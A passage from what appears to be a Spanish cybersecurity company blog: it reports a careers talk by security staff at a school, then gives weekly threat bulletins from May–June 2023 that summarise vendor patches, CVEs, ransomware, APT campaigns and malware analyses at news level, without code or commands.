incluyendo las iniciativas de Telefónica para incorporar nuevos talentos a su plantilla: ha destacado las más de 120 ofertas de empleo publicadas en lo que vamos del año, la incorporación de becarios, las becas Talentum y el Campus 42. ◾ Maria Riesgo Alcaraz, Team Lead del equipo de Analistas Globales, comenzó estudiando el grado de Criminología y Seguridad. Su siguiente paso fue acercarse al mundo de la Ciberinteligencia realizando un Máster de Analista de Inteligencia. Compartió con los asistentes cómo, tras trabajar años en la parte operativa, pasó a llevar un equipo de analistas globales. Estos profesionales se dedican sobre todo en acompañar a los clientes para trasmitirles el valor del servicio, atender sus peticiones y necesidades. También dan apoyo a los compañeros de los departamentos de preventa. Comentó que, además de la importancia de los conocimientos técnicos, también es importante el factor humano, ya que detrás de cada cliente hay un equipo de personas con quienes tratar en el día a día para darles respuestas y soluciones. Cuanta más confianza se transmita a los clientes más sencillo es trabajar con ellos a diario. También destacó la importancia y la suerte que tiene de pertenecer a un gran equipo multidisciplinar, donde cada persona tiene unos conocimientos y capacidades diferentes. El éxito del equipo reside en la buena comunicación y en la confianza en las capacidades y conocimientos de cada compañero ante posibles incidentes de crisis en lo que se refiere a delegar y organizar las prioridades, para dar la mejor respuesta a cada cliente. El éxito del equipo reside en la buena comunicación y en la confianza en las capacidades y conocimientos de cada compañero, ◾ Félix Brezo Fernández, responsable del equipo Threat Intelligence Platform & Reports y ponente habitual en charlas sobre Ciberseguridad, habló de forma emotiva sobre el aporte que se hace desde los distintos servicios para asegurar la continuidad de las empresas, especialmente, cuando estas aportan servicios críticos o esenciales como hospitales, empresas públicas o de energía, universidades, etc. Félix enfatizó la dimensión humana del trabajo del experto en Ciberseguridad que aporta y devuelve su conocimiento a la sociedad. Si una entidad deja de prestar sus servicios por un ciberataque, como el suministro de energía de una ciudad, la realización de una operación quirúrgica con éxito o la entrega en tiempo de componentes necesarios para otras industrias, los expertos que trabajan por mantener los sistemas funcionando de forma segura tienen un impacto directo en la economía de muchas familias. Cuando una organización sufre una incidencia es cuando el tiempo se vuelve un factor más valioso, por lo que las tareas se convierten en actividades contrarreloj. Por último, también transmitió a los chavales la importancia de sentir satisfacción por el trabajo realizado: dar con una profesión en la que sientes que aportas y ayudas a los demás es un plus. Por ello, y porque dedicaremos una gran parte de nuestra vida a la carrera profesional, también ha destacado la importancia de elegir el camino poniendo el foco en aquello que interese y, sobre todo, apasione a cada uno. Sabiendo que los retos a los que uno se enfrentará acabarán siendo complicados, si estás trabajando en algo que te llena superarlos y seguir adelante es siempre un aliciente. ◾ Alberto Campuzano Santaella, analista técnico de Ciberseguridad ha relatado cómo empezó estudiando el Grado Superior de DAM que luego complementó sus estudios con un postgrado y máster en Ciberseguridad. Esto le ha llevado a trabajar primero como programador y luego como analista de Ciberseguridad. Contó su experiencia en la detección y análisis de amenazas como fugas de información, exposición de credenciales y otro tipo de datos. Para ilustrar los ejemplos que mencionó, hizo búsquedas de correos electrónicos en la página web haveibeenpwned.com, mostrando cómo una dirección de correo puede comprometerse en múltiples fugas y explicando los riesgos que esto conlleva. Los chavales se animaron a comprobar si su dirección de email estaba comprometida pero, para alivio de todos, no detectaron en esa plataforma que sus datos se hubieran filtrado. ◾ Carolina Gomez Uriarte, ingeniera de seguridad ofensiva, del equipo Offensive Security Services, destacó la poca oferta educativa en temas de Ciberseguridad que había cuando ella comenzó a estudiar y en comparación con la que se puede encontrar hoy. Compartió su experiencia en las auditorias de seguridad que ha tenido a lo largo de su carrera profesional, y anécdotas de llegar a tomar control dentro de los sistemas de clientes con el fin de mostrar hasta donde podrían entrar los cibercriminales. Tras la charla varios estudiantes y profesores se han acercado a nuestros compañeros para hacer preguntas. Desde el departamento de orientación del instituto agradecieron la charla realizada y nos invitaron a participar en otras iniciativas que organizan. Como la “feria” de empleo que hacen en otoño para que profesionales y empresas participen en orientar a los jóvenes en su futuro laboral o su iniciativa “Instituto y Empresa”, en la que los estudiantes de bachillerato visitan durante un par de días a las empresas para conocerlas, ver sus instalaciones, funcionamiento, equipos… De este modo tienen la oportunidad de conocer en primera persona profesiones y ámbitos profesionales que pueden llamar su atención y motivarles. Foto principal de rawpixel.com en Freepik.
27 de junio de 2023
Boletín de Ciberseguridad, 19 – 23 de junio
Vulnerabilidades críticas en routers de la marca Asus La compañía Asus ha emitido un aviso de seguridad en donde aborda un total de 9 vulnerabilidades que afectan a múltiples modelos de routers. Entre estos fallos de seguridad destacan por su criticidad el registrado como CVE-2022-26376 que se debe a una corrupción de memoria en el firmware Asuswrt que podría permitir a los actores de amenazas realizar ataques de denegación de servicios o permitir la ejecución de código. Asimismo, la vulnerabilidad registrada como CVE-2018-1160 que se produce debido a una debilidad de Netatalk de escritura fuera de los límites, cuyo aprovechamiento podría permitir la ejecución de código arbitrario en dispositivos vulnerables. Asimismo, desde Asus señalan que, es caso de no poder instalar la nueva versión del firmware en los dispositivos afectados, se recomienda deshabilitar los servicios accesibles desde el lado WAN para evitar posibles afectaciones. Más info Vulnerabilidades críticas en complementos de WordPress Investigadores de Defiant han identificado dos vulnerabilidades críticas de omisión de autenticación en dos complementos de WordPress que disponen de decenas de miles de instalaciones. Por una parte, se encuentra el fallo de seguridad registrado como CVE-2023-2986, CVSSv3 de 9.8, y que afecta a Abandoned Cart Lite para WooCommerce. El aprovechamiento de esta vulnerabilidad podría permitir a actores maliciosos iniciar sesión como clientes o acceder a cuentas de administrador llegando a realizar un compromiso del sitio web afectado. No obstante, el problema se ha parcheado en la versión 5.15.1 de Abandoned Cart Lite para WooCommerce. Por otra parte, se encuentra la vulnerabilidad CVE-2023-2834 que afecta al complemento Booklt de WordPress. Un atacante podría aprovechar este fallo para obtener acceso a cualquier cuenta del sitio web afectado, incluida la cuenta del administrador, conociendo únicamente la dirección de correo electrónico. Dicho problema se ha corregido en la versión 2.3.8 de BookIt. Más info Apple parchea los dos 0-days usados en la Operation Triangulation Apple ha lanzado una actualización de seguridad de urgencia para parchear las dos vulnerabilidades 0-day usadas en la Operation Triangulation, como llamó Kaspersky, descubridor del incidente, a la campaña. Las dos vulnerabilidades, CVE-2023-32434 y CVE-2023-32435, eran explotadas en un ataque zero-click (la recepción del mensaje desencadena la infección sin necesidad de interacción del usuario) contra dispositivos iOS a través de iMessage. Esta actualización de seguridad de Apple coincide con la publicación de Kaspersky de su análisis final sobre la llamada Operation Triangulation y el spyware en el que explota los dos 0-days. Kaspersky destaca que éste tiene capacidades para manipular archivos, interferir en procesos en ejecución, exfiltración de credenciales y certificados, así como transmisión de datos de geolocalización, incluidas las coordenadas, la altitud, la velocidad y la dirección del movimiento del dispositivo. Más info Fallo en Microsoft Teams permite distribuir malware El equipo de investigadores de Jumpsec han publicado los resultados de una investigación en la que señalan haber identificado un error de seguridad en Microsoft Teams que podría permitir la distribución de malware. En concreto, los expertos señalan que han descubierto la forma de que una cuenta de fuera de la organización objetivo logre evadir las correspondientes medidas de seguridad para permitir la remisión de software malicioso directamente en la bandeja de entrada. La metodología de ataque funciona en caso de que la víctima ejecute Microsoft Teams con la configuración predeterminada, asimismo el atacante necesita cambiar la identificación del destinatario interno y externo en la solicitud POST de un mensaje, engañando así al sistema para que trate a un usuario externo como interno. De esta forma, cuando se envía el ejecutable, en realidad está alojada en un dominio de SharePoint y el objetivo lo descarga desde allí. Desde Microsoft reconocen el problema, sin embargo han señalado que no cumple con los requisitos para solucionar el fallo de forma inmediata. Más info Nueva variante de Mirai que aprovecha múltiples exploits de IoT Una variante de la botnet Mirai ha sido descubierta por investigadores de la Unidad 42 de Palo Alto Networks. Esta variante se dirige a casi dos docenas de vulnerabilidades de dispositivos de marcas como D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear y MediaTek, con el objetivo de utilizarlos en ataques DDoS. El malware ha sido identificado en dos campañas en curso que comenzaron en marzo y han aumentado en abril y junio; y apunta a un total de 22 agujeros de seguridad conocidos en diversos productos conectados, como routers, DVR, NVR, sistemas de control de acceso, entre otros. El ataque comienza explotando una de las fallas mencionadas y luego descarga un cliente de botnet adecuado para el dispositivo comprometido y accede directamente a las cadenas cifradas, lo que dificulta su detección. A diferencia de otras variantes de Mirai, esta no tiene la capacidad de obtener credenciales de inicio de sesión de fuerza bruta, por lo que depende de la explotación manual de vulnerabilidades por parte de los operadores. Los signos de infección de esta botnet en dispositivos IoT incluyen sobrecalentamiento, cambios en la configuración, desconexiones frecuentes y una disminución general del rendimiento. Más info
23 de junio de 2023
 (1).jpg)
Boletín de Ciberseguridad, 12 – 16 de junio
Microsoft ha corregido más de 70 vulnerabilidades en su Patch Tuesday de junio Microsoft ha lanzado el Patch Tuesday de junio, en el que ha abordado una serie de vulnerabilidades críticas, de gravedad alta, media y baja. Tres de las vulnerabilidades críticas, CVE-2023-29363 , CVE-2023-32014 y CVE-2023-32015, con CVSS 9.8, son en el entorno del servidor Windows Pragmatic General Multicast y pueden conducir a la ejecución remota de código, a través del envío de un archivo especialmente diseñado a través de la red. Por otro lado, el fallo CVE-2023-29357, también con CVSS 9.8, permitiría la escalada de privilegios en Microsoft SharePoint Server. Para la explotación de esta vulnerabilidad no se requiere interacción del usuario y Microsoft aconseja aplicar las actualizaciones y habilitar la función AMSI. Otra de las vulnerabilidades que permite la ejecución remota de código es la CVE-2023-28310, con CVSS 8.0, en Microsoft Exchange Server. Por otro lado, la CVE-2023-29358, permite la escalada de privilegios en la interfaz de dispositivo gráfico de Windows a SYSTEM; al igual que la CVE-2023-29361. En cuanto al fallo en Microsoft Exchange, con CVE-2023-32031 y CVSS 8.8, permite a un atacante apuntar a las cuentas del servidor en una ejecución de código arbitraria. Finalmente, el fallo CVE-2023-29371, en el controlador de kernel de Windows Win32k, podría conducir a una escritura fuera de los límites, otorgando privilegios de SYSTEM y el identificado como CVE-2023-29352, no tan grave, hace referencia a una omisión de la función de seguridad en Windows Remote Desktop. Más info Descubierto un tercer fallo de seguridad en la aplicación MOVEit Transfer La empresa Progress Software recientemente informó acerca de una tercera vulnerabilidad critica en su aplicación MOVEit Transfer. La nueva vulnerabilidad, aún sin identificador CVE, se trata de una inyección de SQL que puede permitir una escalada de privilegios y acceso no autorizado. Todavía no está disponible un parche que aborde este nuevo error de seguridad crítico; la compañía declaró que actualmente se está probando uno y que se lanzará próximamente. Asimismo, Progress recomendó enfáticamente a los usuarios modificar las reglas del firewall para denegar el tráfico HTTP y HTTPs a MOVEit Transfer en los puertos 80 y 443 como como medida de protección temporal. Esta revelación se produce una semana después de que se informara sobre otro conjunto de vulnerabilidades de inyección SQL que podrían utilizarse para acceder a la base de datos de la aplicación. Y se suman a CVE-2023-34362, que fue explotada por la banda de ransomware Clop en ataques de robo de datos cuyos actores continúan extorsionando a las empresas afectadas. Un análisis realizado por Censys reveló que casi el 31% de los más de 1400 hosts expuestos que ejecutan MOVEit pertenecen a la industria de servicios financieros, el 16% a atención médica, el 9% a tecnología de la información y el 8% a sectores gubernamentales y militares. Más info Campaña AiTM contra empresas del sector financiero Investigadores de Microsoft Defender han descubierto la existencia de una campaña de compromiso de correo comercial (BEC, por sus siglas en inglés) que usa la técnica AiTM (adversary in the middle) contra grandes empresas del sector financiero. En el phishing AiTM, los actores de amenazas configuran un servidor proxy entre un usuario objetivo y el sitio web que el usuario desea visitar, que es el sitio de phishing bajo el control de los atacantes. El servidor proxy permite a los atacantes acceder al tráfico y capturar la contraseña del objetivo y la cookie de sesión. Según Microsoft, el ataque comenzó con el compromiso de la cuenta de correo de una empresa reputada, usando esa dirección email para distribuir el phishing AiTM y robar así las credenciales de sus contactos, que habrían accedido a la URL dada la relación de confianza con el supuesto emisor (suplantado por el atacante) del correo. Microsoft atribuye esta campaña a un actor de amenazas que ha denominado como Storm-1167 (en la taxonomía de Microsoft el nombre Storm indica que se desconoce el origen del grupo criminal). Más info DoubleFinger distribuye tanto Remcos RAT como el stealer GreetingGhoul SecureList ha publicado un informe sobre un nuevo loader llamado DoubleFinger, que destaca por el uso de técnicas de estenografía como forma de ocultar payloads. Este malware ejecuta una shellcode en el equipo infectado que descarga un archivo en formato PNG desde la plataforma de intercambio de imágenes Imgur.com, pero en realidad no es una imagen: el archivo contiene varios componentes en forma cifrada: por un lado GreetingGhoul, un stealer que tiene como objetivo los monederos de criptomonedas y por el otro, el troyano de acceso remoto Remcos. SecureList afirma haber visto DoubleFinger, que se distribuye a través de phishing por correo electrónico, atacando entidades en Europa, Estados Unidos y América Latina. Más info Utilizan el potente motor BatCloak para hacer malware totalmente indetectable Trendmicro ha publicado un análisis sobre el motor de ofuscación de malware BatCloak, su integración modular en el malware moderno, los mecanismos de proliferación y las implicaciones para la interoperabilidad a medida que los actores de amenazas se aprovechan de sus capacidades totalmente indetectables. Como resultado, los actores de amenazas pueden cargar varias familias de malware y exploits aprovechando archivos por lotes altamente ofuscados sin problemas. Los resultados de las investigaciones mostraron que un asombroso 80% de las muestras recuperadas no fueron detectadas por las soluciones de seguridad. Este hallazgo subraya la capacidad de BatCloak para eludir los mecanismos de detección tradicionales empleados por los proveedores de seguridad. Además, si se considera el conjunto total de 784 muestras, la tasa media de detección fue inferior a uno, lo que pone de relieve el reto que supone identificar y mitigar las amenazas asociadas a piezas de malware protegidas con BatCloak. Más info
16 de junio de 2023
.jpg)
Boletín de Ciberseguridad, 5 – 9 de junio
Barracuda advierte acerca del reemplazo inmediato de los dispositivos ESG vulnerados La empresa de seguridad Barracuda emitió una advertencia en la cual está instando a las organizaciones afectadas por la vulnerabilidad 0-day (CVE-2023-2868) en sus dispositivos Email Security Gateway (ESG) a reemplazarlos completamente. A pesar de que ya ha sido parcheada y el acceso de los atacantes a los dispositivos comprometidos fue eliminado, la recomendación de la compañía es el reemplazo inmediato de los dispositivos afectados, sin importar la versión del parche instalado. El alcance exacto del incidente aún es desconocido. La vulnerabilidad, que ha sido explotada durante al menos siete meses permite la inyección remota de código en los archivos adjuntos de los correos electrónicos entrantes, instalar malware personalizado, cargar o descargar archivos, ejecutar comandos, establecer persistencia y establecer shells inversos en un servidor controlado por un actor malicioso. Los usuarios afectados ya han sido notificados a través de la interfaz de usuario de ESG. Barracuda insiste a las organizaciones que aún no hayan reemplazado sus dispositivos a que se pongan en contacto con el soporte urgentemente por correo electrónico. Más info Advisory conjunto de la CISA y el FBI sobre el ransomware CLOP Como parte de la campaña #StopRansomware, CISA y FBI han publicado de forma conjunta una alerta en la que se incluyen nuevas tácticas, técnicas y procedimientos (TTPs) e indicadores de compromiso (IOCs) asociados al ransomware CLOP. La nota destaca la explotación que el grupo está haciendo de CVE-2023-34362, vulnerabilidad 0-day en MOVEit Transfer, para ejecutar en las víctimas una webshell llamada LEMURLOOT con la que robar datos. Por otra parte, CLOP, a través de un comunicado en su web de la red TOR, reconoció que gracias a esta vulnerabilidad ha comprometido a cientos de empresas y que da a los afectados de plazo hasta el 14 de junio para contactarles y comenzar la negociación del rescate. Si no llegan a un acuerdo pasadas 72 horas una vez iniciada la negociación, publicarán los datos. Asimismo, cabe indicar que los investigadores de Kroll descubrieron evidencias de actividad similar en registros de clientes afectados en el pasado, indicando que los actores de amenazas estaban probando el acceso y extracción de datos en servidores MOVEit Transfer comprometidos desde al menos 2021. Más info Vulnerabilidades críticas en productos Cisco La compañía Cisco ha emitido varios avisos de seguridad para corregir hasta un total de 8 vulnerabilidades, siendo 2 de estas catalogadas como críticas, 3 con riesgo alto y otras 3 clasificadas como medio. De entre los fallos de seguridad de mayor criticidad cabe indicar que afectan a los productos Cisco Expressway Series y Cisco TelePresence Video Communication Server habiendo sido registrados como CVE-2023-20105 y CVE-2023-20192. Con respecto a la primera de las vulnerabilidades indicadas, esta deriva del manejo incorrecto de las solicitudes de cambio de contraseña, lo que permitiría a un atacante alterar las contraseñas de cualquier usuario en el sistema. Con respecto a la segunda, podría permitir a un atacante local autenticado ejecutar comandos y modificar los parámetros de configuración del sistema. Desde Cisco señalan que no hay evidencias de que estas vulnerabilidades hayan sido aprovechadas, no obstante, recomiendan a los usuarios actualizar los activos lo antes posible para mitigar estos fallos de seguridad. Más info Nueva actualización de seguridad en Chrome Google ha emitido una actualización de seguridad de su navegador Chrome en la que aborda 2 actualizaciones de seguridad, siendo una de ellas catalogada de alta criticidad. En concreto, este fallo de seguridad ha sido identificado por el investigador de seguridad Clément Lecigne el pasado 1 de junio de 2023, siendo registrado como CVE-2023-3079, y aún pendiente de CVSS. Se trata de una vulnerabilidad en V8 que permitiría a un atacante remoto crear una página HTML que desencadene en una escalada de privilegios y ejecutar código arbitrario. Asimismo, cabe destacar que Google ha señalado de que es consciente de que existe un exploit para esta vulnerabilidad. En último lugar, cabe indicar que este fallo de seguridad se corrige con la actualización en las versiones 114.0.5735.106 en dispositivos Mac y Linux y 114.0.5735.110 para Windows. Más info Foto principal: rawpixel.com en Freepik.
9 de junio de 2023
Boletín semanal de Ciberseguridad, 27 de mayo – 2 de junio
Descubierta puerta trasera en cientos de placas base Gigabyte Investigadores de ciberseguridad de Eclypsium descubrieron una puerta trasera secreta en el firmware de cientos de modelos de placas base Gigabyte, un reconocido fabricante taiwanés. Cada vez que se reinicia una máquina con una de estas placas base, se activa silenciosamente una aplicación de actualización descargada y ejecutada por el firmware de la placa, lo que permite la instalación de otro software, posiblemente malicioso. El firmware de estos sistemas elimina un binario de Windows al iniciar el sistema operativo y descarga y ejecuta otra carga útil desde los servidores de Gigabyte a través de una conexión insegura sin verificar la legitimidad del archivo. Se identificaron 271 versiones diferentes de placas base como vulnerables. Aunque la función parece estar relacionada con el Gigabyte App Center, es difícil descartar la posibilidad de una puerta trasera maliciosa debido a la falta de autenticación adecuada y el uso de conexiones HTTP inseguras en lugar de HTTPS, lo que podría permitir ataques man-in-the-middle. Incluso si Gigabyte soluciona el problema, las actualizaciones de firmware pueden fallar en las máquinas de los usuarios debido a su complejidad y dificultad para emparejarse con el hardware. Además, el actualizador podría ser utilizado maliciosamente por actores en la misma red para instalar su propio malware. Más info CYBER SECURITY Inteligencia Artificial, ChatGPT y Ciberseguridad 15 de febrero de 2023 Campaña de SharpPanda contra el G20 Cyble ha publicado una investigación en la que comparte sus hallazgos sobre la campaña que está desarrollando actualmente el grupo de espionaje SharpPanda, supuestamente respaldado por el gobierno chino, contra los países miembros del G20 (el foro internacional que reúne a los países más industrializados del mundo junto con organizaciones como la ONU o el Banco Mundial). Según explica Cyble, la campaña empieza con la distribución de emails a altos funcionarios de los países objetivo en los que se incluye un archivo .docx supuestamente generado por el G7 (grupo de países dentro del G20). Este archivo descarga un documento RTF que incluye el kit de malware RoyalRoad. El exploit crea una tarea programada y ejecuta un downloader de malware DLL, que ejecuta otra DLL del Command & Control (C2). RoyalRoad aprovecha un conjunto específico de vulnerabilidades, incluidas CVE-2018-0802 , CVE-2018-0798 y CVE-2017-11882 , dentro de Microsoft Office. Más info Vulnerabilidad 0-day explotada activamente en Email Security Gateway durante meses Recientemente Barracuda emitió un comunicado en el que advertía a sus clientes sobre una vulnerabilidad 0-day activamente explotada en su activo Email Security Gateway. En concreto, dicho fallo de seguridad fue identificado como CVE-2023-2868 y se señala que su aprovechamiento podría permitir a un atacante remoto realizar ejecución de código en sistemas vulnerables. Sin embargo, han surgido nuevas informaciones que han identificado que la explotación de esta vulnerabilidad llevaría produciéndose desde el pasado mes de octubre de 2022 empleando hasta un total de tres cepas diferentes de malware, los cuales son Saltwater, Seaspy y Seaside. Desde Barracuda no han dado información sobre las víctimas de forma pública, pero identificaron evidencias en donde se habrían producido exfiltración de información en algunas víctimas a las cuales se ha reportado toda la información. En último lugar, cabe destacar que dicha vulnerabilidad afecta las versiones 5.1.3.001 a 9.2.0.006 y que fue corregida el pasado 20 y 21 de mayo. Más info CYBER SECURITY Consecuencias de un ciberataque en entornos industriales 17 de enero de 2023 Nuevo análisis del ransomware BlackCat El equipo de investigadores de IBM ha publicado un análisis en el que menciona nuevas variantes de ransomware que permiten una mejor exfiltración de datos y evasión de soluciones de seguridad. En concreto, los expertos señalan que los operadores del ransomware BlackCat/ALPHV continúan evolucionando la herramienta, especialmente desde dos perspectivas. Por una parte, los operadores de este software malicioso utilizarían en sus operaciones el malware ExMatter, cuya función consiste en optimizar los procesos de exfiltración de archivos. Por otra parte, desde IBM señalan que ha analizado una nueva cepa de BlackCat, a la que han denominado Sphynx, la cual destaca por disponer de una serie de capacidades que le permiten evadir más eficazmente soluciones de seguridad. Desde IBM señalan que estas evoluciones de ransomware evidencian que los operadores detrás de estas amenazas cada vez conocen más las infraestructuras de los sistemas y tratan de mejorar su eficiencia en las operaciones. Más info La CISA ha alertado acerca de dos vulnerabilidades en sistemas de control industrial La CISA ha publicado un aviso acerca de dos vulnerabilidades que afectan a sistemas de control industrial, específicamente al producto MXsecurity de Moxa. En primer lugar, la vulnerabilidad identificada como CVE-2023-33235, con CVSS de 7.2, es de inyección de comandos y puede ser aprovechada por atacantes que hayan obtenido privilegios de autorización, pudiendo salir del shell restringido y ejecutar código arbitrario. Por otro lado, la CVE-2023-33236, con CVSS 9.8, puede ser explotada para crear tokens JWT arbitrarios y omitir la autenticación de las API basadas en la web. Cabe destacar que Moxa ha abordado estos fallos con la actualización a la versión v1.0.1. Por su parte, la CISA recomienda a los usuarios implantar medidas defensivas para minimizar el riesgo de explotación, como minimizar la exposición de la red para los dispositivos, utilizar firewalls y VPN. Más info Foto principal: DCStudio en Freepik.
2 de junio de 2023
Boletín semanal de Ciberseguridad, 22 – 26 de mayo
GitLab parchea una vulnerabilidad crítica GitLab ha abordado una vulnerabilidad crítica que afecta a GitLab Community Edition (CE) y Enterprise Edition (EE) en la versión 16.0.0. En concreto, dicho fallo de seguridad ha sido registrado como CVE-2023-2825, CVSSv3 de 10, y fue descubierto por un investigador de seguridad llamado pwnie. En cuanto a la causa del fallo este surge de un problema de cruce de rutas que podrían permitir a un atacante no autenticado leer archivos arbitrarios en el servidor cuando existe un archivo adjunto en un proyecto público anidado dentro de al menos cinco grupos. Por tanto, la explotación de esta vulnerabilidad podría desencadenar en la exposición de datos confidenciales como códigos de software patentados, credenciales de usuario, tokens, archivos y otra información privada. Desde GitLab recomiendan a sus usuarios actualizar a la última versión, 16.0.1, para solucionar este problema de seguridad. Más info → Zyxel corrige dos vulnerabilidades críticas que afectan a sus firewalls Zyxel ha emitido un aviso de seguridad en donde informa sobre dos vulnerabilidades críticas que afectan a varios de sus modelos de firewall. En concreto, estos fallos de seguridad son el registrado como CVE-2023-33009, con un CVSSv3 de 9.8, que se trata de una vulnerabilidad de desbordamiento de búfer en la función de notificación que podría desencadenar en que un actor malicioso no autenticado pueda realizar una ejecución de código remoto o realizar un ataque de DDoS. Asimismo, el fallo asignado como CVE-2023-33010, cuenta un CVSSv3 de 9.8, que también es una vulnerabilidad de desbordamiento de búfer en la función de procesamiento de ID y su aprovechamiento puede derivar en las mismas tipologías de ataque que la anterior. Desde Zyxel recomienda a sus usuarios aplicar las correspondientes actualizaciones de seguridad para mitigar el riesgo de explotación de estas dos fallas. Más info → Repunte en volumen y complejidad de los ataques BEC En un informe reciente de Microsoft Cyber Signals, los equipos de CTI de Microsoft advierten de un significativo repunte de los ataques BEC (Business Email Compromise) entre abril de 2022 y abril de 2023 que se han traducido en pérdidas estimadas por el FBI de 2300 millones de dólares. Entre las tendencias más observadas destacan dos: el uso de BulletProftLink (un marketplace cibercriminal que facilita todo tipo de utilidades para efectuar campañas de phishing y spam) y la compra de direcciones IP comprometidas de carácter residencial que son utilizadas como proxy para enmascarar sus ataques de ingeniería social. Entre sus objetivos de mayor interés se encuentran directivos, gerentes y jefes de equipo de los departamentos financieros y recursos humanos con acceso a información personal de sus empleados. Para mitigar el impacto de estas campañas, Microsoft recomienda maximizar las opciones de seguridad de los buzones de correo, activar la autenticación multifactor y mantener informada y entrenada a la plantilla sobre este tipo de ataques. Más info → Volt Typhoon: APT china contra infraestructuras críticas de Estados Unidos Tanto Microsoft Threat Intelligence como la CISA han publicado un informe sobre una APT supuestamente respaldada por el gobierno chino a la que han llamado Volt Typhoon y a la que acusan de estar detrás de una campaña de ataques contra infraestructuras críticas de Estados Unidos tales como instituciones gubernamentales, militares, empresas de telecomunicaciones o el transporte marítimo, entre otros. En concreto, Microsoft afirma que Volt Typhoon ha tratado de acceder a activos militares de Estados Unidos situados en la isla de Guam, territorio clave en caso de conflicto en Taiwán o el Pacífico usando como vector de entrada dispositivos FortiGuard expuestos a Internet mediante la explotación de vulnerabilidades 0-day para extraer credenciales que les permitan el movimiento lateral. Microsoft destaca que Volt Typhoon abusa de las herramientas legítimas presentes en los sistemas atacados camuflando su actividad como procesos rutinarios para tratar de pasar inadvertidos, técnica conocida como Living Off The Land (LOTL). Más info → Vulnerabilidad en KeePass permite recuperar contraseñas maestras Investigadores de seguridad han publicado un artículo sobre una nueva vulnerabilidad que permite recuperar las contraseñas maestras en el gestor de contraseñas KeePass. La vulnerabilidad ha sido clasificada como CVE-2023-32784 y afecta a las versiones 2.x de KeePass para Windows, Linux y macOS. Se espera que sea parcheada en la versión 2.54, asimismo, cabe indicar que dicho fallo de seguridad cuenta con una PoC disponible. Para su explotación, no importa de dónde provenga la memoria, y si el espacio de trabajo está bloqueado o no. Además, también es posible volcar la contraseña desde la RAM cuando KeePass ya no se esté ejecutando. Cabe destacar que la explotación exitosa del fallo se basa en la condición de que un atacante ya haya vulnerado el equipo de un objetivo potencial y que se requiere que la contraseña se escriba en un teclado y no se copie desde el portapapeles del dispositivo. Más info → Foto de apertura: Pankaj Patel / Unsplash
26 de mayo de 2023
Boletín semanal de Ciberseguridad, 15 – 19 de mayo
Vulnerabilidades en plataformas cloud El equipo de investigadores de Otorio descubrió 11 vulnerabilidades que afectan a diferentes proveedores de plataformas de administración de cloud. En concreto, se tratan de Sierra Wireless, Teltonika Networks e InHand Networks las compañías afectadas. En relación con los fallos de seguridad los que afectan a Teltonika Networks son CVE-2023-32346, CVE-2023-32347, CVE-2023-32348, CVE-2023-2586, CVE-2023-2587 y CVE-2023-2588 identificados en el sistema de administración remota (RMS), su explotación podría exponer información confidencial y permitir la ejecución remota de código (RCE). En relación con las vulnerabilidades en InHand Networks, CVE-2023-22600, CVE-2023-22598, CVE-2023-22599, CVE-2023-22597 y CVE-2023-2261 podrían ser aprovechadas por actores maliciosos para realizar RCE. En último lugar, los fallos identificados en Sierra Wireless, CVE-2023-31279 y CVE-2023-31280, podrían permitir a un atacante buscar dispositivos no registrados que estén conectados a la nube, obtener sus números de serie y registrarlos en una cuenta bajo su control con el objetivo de ejecutar comandos. Más info → El nuevo TLD .zip, bajo la lupa de los investigadores El 3 de mayo Google abrió el registro de nuevos dominios bajo ocho nuevos TLD que incluyen .dad, .esq, .prof, .phd, .nexus, .foo, .mov y, especialmente, .zip. El registro de este último está generando mucha controversia entre la comunidad de seguridad dado que puede ser utilizado en campañas de phishing que distribuyan archivos comprimidos .zip. Algunos investigadores ya han conseguido ingeniárselas para aprovechar la existencia de estos dominios junto con el uso de caracteres especiales en la barra de direcciones y camuflar enlaces a archivos maliciosos bajo direcciones URL con la apariencia de ser legítimas. Para ello, un adversario podría utilizar caracteres Unicode especiales como las barras de U+2044 (⁄) y U+2215 (∕) que visualmente se parecen al carácter de la barra convencional, U+002F (/) y explotar la forma en que algunos navegadores interpretan el carácter arroba (@) en una dirección URL para conseguir redirecciones no deseadas. Por este motivo, se recomienda prestar atención a todos aquellos enlaces que contengan los caracteres U+2044 (⁄) y U+2215 (∕), que además incluyan una arroba y que apunten a presuntos ficheros comprimidos .zip dado que podrían incluir, en realidad, una redirección encubierta hacia dominios de este nuevo TLD. Más info → Vulnerabilidades críticas en Cisco Small Business Series Switches Cisco ha emitido un aviso de seguridad en el que informa de que ha corregido nueve vulnerabilidades críticas en sus productos Small Business Series Switches. A las vulnerabilidades se les han asignado los siguientes CVE y CVSS: CVE-2023-20159 (CVSS: 9.8), CVE-2023-20160 (CVSS: 9.8), CVE-2023-20161 (CVSS: 9.8), CVE-2023-20189 (CVSS: 9.8), CVE-2023-20024 (CVSS: 8.6), CVE-2023-20156 (CVSS: 8.6), CVE-2023-20157 (CVSS: 8.6), CVE-2023-20158 (CVSS: 8.6) y CVE-2023-20162 (CVSS: 7.5). Todos los agujeros de seguridad afectan a las versiones 200, 250, 300, 350, 350X y 500 de Small Business Series Switches y se deben a una validación incorrecta de las solicitudes que se envían a la interfaz web. Lo cual podría permitir que un actor de amenazas remoto no autenticado provoque una condición de denegación de servicio (DoS) o ejecute código arbitrario con privilegios de root en un dispositivo afectado. Cisco informa de que ha emitido actualizaciones de software que abordan estas vulnerabilidades y que no hay soluciones alternativas por lo que se recomienda actualizar a la última versión disponible. Más info → Google corrige una vulnerabilidad crítica en Chrome 113 Google ha emitido una actualización de seguridad de Chrome 113 en la que se corrigen un total de 12 vulnerabilidades, una de ellas crítica. Esta última, identificada como CVE-2023-2721 y aún pendiente de CVSS, se trata de una vulnerabilidad use-after-free (UAF) que permitiría a un atacante remoto crear una página HTML que desencadene una situación de heap corruption cuando un usuario acceda a la misma. Para que un atacante pudiera explotar este error de seguridad sería necesario convencer al usuario de visitar la página. Esta y otras cinco de las vulnerabilidades corregidas habrían sido notificada a Google por investigadores externos cuyas recompensas irían de los 1500$ a los 7000$. Esta actualización está disponible para versiones 113.0.5672.126 en dispositivos Mac y Linux y 113.0.5672.126/.127 para Windows. Más info → Apple corrige tres vulnerabilidades 0-day y decenas de CVEs más en toda su gama Apple ha publicado actualizaciones de seguridad para iOS, iPadOS, macOS, tvOS, watchOS y el navegador web Safari; y advirtió acerca de tres vulnerabilidades 0-day que se estarían explotando activamente. Dichos errores de seguridad afectan el motor de navegador WebKit que Apple emplea en su navegador Safari, y requiere que lo utilicen otros navegadores en iOS. La primera vulnerabilidad (CVE-2023-32409) es una fuga de sandbox que permite a los atacantes remotos escapar de los sandboxes de contenido web. Las otras dos (CVE-2023-28204 y CVE-2023-32373) 